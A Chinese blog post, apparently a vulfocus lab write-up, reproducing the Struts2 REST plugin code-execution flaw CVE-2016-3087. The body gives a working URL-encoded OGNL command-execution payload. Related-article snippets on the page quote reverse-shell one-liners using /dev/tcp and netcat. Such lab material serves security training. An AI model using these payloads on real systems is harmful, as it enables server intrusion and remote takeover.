vulfocus——struts2代码执行(CVE-2016-3087)

最新推荐文章于 2024-04-24 10:33:50 发布
最新推荐文章于 2024-04-24 10:33:50 发布
阅读量907 收藏 2
点赞数
CC 4.0 BY-SA版权
分类专栏: vulfocus复现 文章标签: servlet
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_62063669/article/details/126803442
本文详细介绍了Struts2框架中的一个安全漏洞,该漏洞存在于Struts2.3.20到2.3.28版本(除了2.3.20.3和2.3.24.3),当启用REST插件且DynamicMethodInvocation配置为true时,攻击者可能通过恶意OGNL表达式执行任意代码。文章提供了漏洞复现步骤,包括访问特定的URL和使用命令执行POC,强调了这一漏洞对服务器安全的严重威胁。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

描述

Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。

Struts 2.3.20 - Struts Struts 2.3.28 (除2.3.20.3及2.3.24.3)版本,使用REST插件情况下,若启用了Dynamic Method Invocation,可能导致通过恶意表达式在服务器端执行任意代码。

复现

1.打开靶场环境 ,访问web页面

 2.有回显poc(命令执行)

%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23process%3D@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]),%23ros%3D(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())%2C@org.apache.commons.io.IOUtils@copy(%23process.getInputStream()%2C%23ros)%2C%23ros.flush(),%23xx%3d123,%23xx.toString.json?&command=whoami

%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23process%3D@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]),%23ros%3D(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())%2C@org.apache.commons.io.IOUtils@copy(%23process.getInputStream()%2C%23ros)%2C%23ros.flush(),%23xx%3d123,%23xx.toString.json?&command=ls

3.用工具来获取flag

struts2 代码执行CVE-2018-11776)
qq_32445755的博客
03-08 927
影响版本 Struts<= Struts 2.3.34, Struts 2.5.16 Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。 action元素没有设置名称空间属性,或者使用了通配符名称空间将由用户从uri传递并解析为OGNL表达式,最终导致远程代码执行漏洞。路径为/struts2-showcase/ ...
vulfocus靶场struts2 命令执行 CVE-2016-3081
没有故事
04-23 625
后面接payload。Struts 2服务器上执行任意代码,取得网站服务器控制权。payload: 红色部分为可替换的执行命令。远程攻击者利用漏洞可。
vulfocus-struts2 命令执行 (CVE-2016-3081)
Fanny0602的博客
06-16 2117
vulfocus靶场:struts2 命令执行 (CVE-2016-3081)。
struts2 代码执行 (CVE-2020-17530)
yxr520yj的博客
09-27 1211
struts在某些情况下可能存在OGNL表达式注入注入漏洞,如果开发人员使用了%{…}语法,进行强制的OGNL解析,某些特殊的TAG属性可能被双重解析,攻击者可以通过构造恶意的OGNL表达式来利用此漏洞,最终造成远程代码执行。OGNL表达式注入注入漏洞,如果开发人员使用了%{…}语法,进行强制的OGNL解析,某些特殊的TAG属性可能被双重解析,攻击者可以通过构造恶意的OGNL表达式来利用此漏洞,最终造成远程代码执行漏洞。#struts2代码执行漏洞。
struts源代码阅读(struts 的执行)
javaGirl专栏
10-30 587
第二篇 struts的执行(struts-1.1版)本篇详细介绍struts在初始化之后是如何处理一个请求,并返回数据的。这里最核心的类是RequestProcessor以及RequestUtils。RequestProcessor类通过RequestDispatcher实现页面的跳转,而RequestProcessor负责处理request中传来的请求信息,存放到FormBeanConfig中,
vulfocus 靶场struts2 代码执行CVE-2020-17530)
最新发布
没有故事
04-24 1688
由于Struts2 会对某些标签属性(比如 id) 的属性值进行二次表达式解析,因此当这些标签属性中使用了 %{x} 且 x 的值用户可控时,用户即可构造一些SSRF、远程命令执行等形式的payload,并将这些恶意payload以%{...}形式传入该标签属性, 即可造成OGNL表达式执行。bash -c {echo,编码后的内容} |{base64 ,-d}|{bash , -i} #或: 抓包,改为如下内容: 红色部分为要更改的地方。监听机进行监听:nc -lvvp。
Phpmyadmin后台代码执行CVE-2016-5734_poc
09-30
Phpmyadmin后台代码执行CVE-2016-5734_poc CVE-2016-5734在exploit-db上也就是 phpMyAdmin 4.6.2 - Authenticated Remote Code Execution ,意即phpMyAdmin认证用户的远程代码执行,根据描述可知受影响的phpMyAdmin...
CVE-2016-3720
02-22
这个项目是CVE-2016-3720 Demo,为了避免搭建环境,大佬们可以直接获取到这个资源。 相对应的分析文章是:https://blog.youkuaiyun.com/qq_36869808 可以在这篇文章看到分析的内容,感谢~当然如果非常需要这个资源,也...
vulfocus靶场jenkins代码执行漏洞cve-1027-1000353
没有故事
04-23 475
java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "bash -c {echo,上一步生成的base64编码}|{base64,-d}|{bash,-i}"python3 exploit.py http://受害者IP:端口 jenkins_poc.ser。bash -i >& /dev/tcp/监听机的IP/端口 0>&1。攻击机监听: nc -lvp 4444。GitCode - 开发者的代码家园。
struts2示例代码-struts2的配置
分享
08-09 574
这篇文章是关于struts2的配置,
struts2部分代码
09-01
struts2部分代码
struts2实例代码
08-09
里面的方法包括三种不同的方法实现ajax,以及对获得的变量的处理,属于一篇博客的源码,配合源码食用效果更佳
struts2源代码
11-29
struts2源代码,亲测可用,欢迎下载,共同交流。 为什么没有0资源分!
struts2 项目源代码
01-11
北大青鸟 struts2 项目源代码 值得一看
最简单的Struts2的代码示例
11-30
最简单的Struts2的代码示例,我的空间有详细说明~~~~~~~~~~~~~~~~~~~~~~~~~~~
Struts2 源代码学习 (一)
weixin_34310785的博客
04-06 109
Struts执行流程图如下所示: 系统 : 1,整体的组织体结构 2,执行流程 3,特性 执行流程: 1,一个初始的请求到达了servlet容器 2,这个请求要通过一系列的过滤链 3,这个链包括ActionContextCleanUp过滤器,这个过滤器用于当集成了SiteMesh Plugin技术时, 4,接着FilterDispatcher被调...
struts2 代码执行CVE-2018-11776)漏洞复现 vulfocus夺旗
muhan的博客
04-15 4969
1、启动环境:直接vulfocus搜索cve编号启动,并访问环境ip地址 2、判断是否有漏洞: 使用特定payload拼接url,访问抓包 ip地址/struts2-showcase/$%7B233*233%7D/actionChain1.action 利用BurpSuite抓包并改包,Go得到下图所示结果,说明存在漏洞。可以看到,233X233的结果已经在Location头中返回 3、构造POC,替换掉请求内容 原始poc: ${(#dm=@ognl.OgnlContext@DEFAULT
struts2代码执行漏洞
weixin_30530939的博客
01-09 89
刚刚@乌云-漏洞报告平台公布的struts2代码执行漏洞,具体的漏洞说明地址 https://www.sec-consult.com/files/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt 还是热乎的,我大概白话一下。 这个漏洞的级别很高,都升级修补一下。 影响版本是2.3.1和2.3.1之前的版本 解决办法是升级...
Struts2_实例代码
大保健
06-13 179
Struts2包下的default.properties中配置了 Struts2 应用中一些变量  可在struts.xxml文件中修改这些配置变量如    Struts2 默认受理   .action   或无扩展名    经过配置, 可受理 .action   .do    或无扩展名      &lt;constant name="struts.action.extension"  valu...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值